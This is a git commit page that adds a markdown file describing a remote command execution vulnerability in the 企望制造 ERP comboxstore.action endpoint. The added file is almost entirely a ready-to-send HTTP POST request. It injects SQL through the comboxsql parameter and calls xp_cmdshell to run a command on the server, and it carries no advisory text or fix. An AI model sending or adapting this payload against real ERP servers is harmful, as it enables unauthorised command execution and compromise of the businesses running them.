Create 企望制造 ERP comboxstore.action 远程命令执行漏洞.md

2023-08-20 09:33:11 +08:00 · 2023-08-20 09:33:11 +08:00 · 95aa39046e
commit 95aa39046e
parent be79969d3f
1 changed files with 9 additions and 0 deletions
--- a/远程命令执行漏洞.md
+++ b/远程命令执行漏洞.md
@ -0,0 +1,9 @@
+## 企望制造 ERP comboxstore.action 远程命令执行漏洞
+```
+
+POST /mainFunctions/comboxstore.action HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+Host: xxx.xxx.xxx.xxx
+
+comboxsql=exec%20xp_cmdshell%20'type%20C:\Windows\Win.ini'
+```